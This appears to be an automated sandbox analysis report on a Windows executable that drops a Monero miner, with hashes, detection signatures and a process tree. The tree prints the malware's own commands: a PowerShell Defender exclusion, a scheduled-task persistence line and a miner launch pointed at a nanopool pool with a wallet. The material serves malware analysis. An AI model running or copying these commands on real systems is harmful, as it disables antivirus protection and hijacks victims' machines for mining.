Analysis
-
max time kernel
135s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20220901-en -
resource tags
arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system -
submitted
24/11/2022, 09:04
Static task
static1
General
-
Target
f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe
-
Size
1.4MB
-
MD5
073a3dc0c60492b618f888c5e603fd05
-
SHA1
4de52c57f8f032724452e901120bcf0fbee52902
-
SHA256
f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
-
SHA512
4262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
SSDEEP
24576:W+wHtwQBTvwpeNrT2i8k57TujjVx3KClNyOiY:W+sBTopej8Mw3NlNF
Malware Config
Signatures
-
XMRig Miner payload 6 IoCs
resource yara_rule behavioral1/memory/3064-181-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3064-182-0x0000000140343234-mapping.dmp xmrig behavioral1/memory/3064-183-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3064-184-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3064-188-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig behavioral1/memory/3064-191-0x0000000140000000-0x00000001407C9000-memory.dmp xmrig -
Executes dropped EXE 1 IoCs
pid Process 3832 OWT.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation OWT.exe -
Uses the VBS compiler for execution 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3832 set thread context of 3064 3832 OWT.exe 98 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4408 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 2404 timeout.exe -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4956 f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe 4956 f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe 4832 powershell.exe 4832 powershell.exe 3832 OWT.exe 3832 OWT.exe 4372 powershell.exe 4372 powershell.exe 3832 OWT.exe 3832 OWT.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 672 Process not Found -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4956 f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe Token: SeDebugPrivilege 4832 powershell.exe Token: SeDebugPrivilege 3832 OWT.exe Token: SeDebugPrivilege 4372 powershell.exe Token: SeLockMemoryPrivilege 3064 vbc.exe Token: SeLockMemoryPrivilege 3064 vbc.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 3064 vbc.exe -
Suspicious use of WriteProcessMemory 28 IoCs
description pid Process procid_target PID 4956 wrote to memory of 4832 4956 f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe 81 PID 4956 wrote to memory of 4832 4956 f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe 81 PID 4956 wrote to memory of 3336 4956 f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe 83 PID 4956 wrote to memory of 3336 4956 f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe 83 PID 3336 wrote to memory of 2404 3336 cmd.exe 85 PID 3336 wrote to memory of 2404 3336 cmd.exe 85 PID 3336 wrote to memory of 3832 3336 cmd.exe 86 PID 3336 wrote to memory of 3832 3336 cmd.exe 86 PID 3832 wrote to memory of 4372 3832 OWT.exe 89 PID 3832 wrote to memory of 4372 3832 OWT.exe 89 PID 3832 wrote to memory of 2100 3832 OWT.exe 92 PID 3832 wrote to memory of 2100 3832 OWT.exe 92 PID 2100 wrote to memory of 4408 2100 cmd.exe 93 PID 2100 wrote to memory of 4408 2100 cmd.exe 93 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98 PID 3832 wrote to memory of 3064 3832 OWT.exe 98
Processes
-
C:\Users\Admin\AppData\Local\Temp\f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe"C:\Users\Admin\AppData\Local\Temp\f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCD76.tmp.bat""2⤵
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\system32\timeout.exetimeout 33⤵
- Delays execution with timeout.exe
PID:2404
-
-
C:\ProgramData\winrar\OWT.exe"C:\ProgramData\winrar\OWT.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3832 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4372
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:2100 -
C:\Windows\system32\schtasks.exeschtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "OWT" /tr "C:\ProgramData\winrar\OWT.exe"5⤵
- Creates scheduled task(s)
PID:4408
-
-
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero4⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3064
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
1.4MB
MD5073a3dc0c60492b618f888c5e603fd05
SHA14de52c57f8f032724452e901120bcf0fbee52902
SHA256f4fcbc524c30e4469464eb1c5641577b1042bd6fb5f44835731a3ee156d29c27
SHA5124262dd0e07f0d083c75607a0a67e20b8b8f85c57aeeba2359cc92731a82ba9d2191482cb3d28c7c8f1163b0d9604bf1cfba5ffe168ad7bb6fc7c1c11c99c0d7f
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
138B
MD5874e7ceba0f3ae885f92f86c6df6e2be
SHA1d517d1dde905e6128eb4fdc87f43de81740d7e82
SHA2562f6fce8244e11a57cad8b22fd4a8a813e20481640bb5aace453f5499ec9d6132
SHA512a83d7366ee81e6e6e9df2c380960d01a59e446214db172fbfa9dca2b972b34a8802226bc14ddabb802416516fc5e614dc4204798da5f1599393416a2a4dbb508